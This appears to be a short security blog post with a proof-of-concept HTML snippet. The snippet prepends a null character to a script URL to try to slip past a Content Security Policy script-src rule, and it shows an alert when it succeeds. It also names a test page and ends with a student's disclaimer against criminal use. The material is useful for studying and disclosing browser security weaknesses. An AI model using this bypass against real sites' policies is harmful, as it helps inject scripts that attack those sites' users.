PoC:
<input type=button value="test" onclick="
a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400);
return false;">
The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v2/ ;
The PoC worked if you see a popup containing stripes e(){} object. You can test this on http://ejj.io/test.php
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal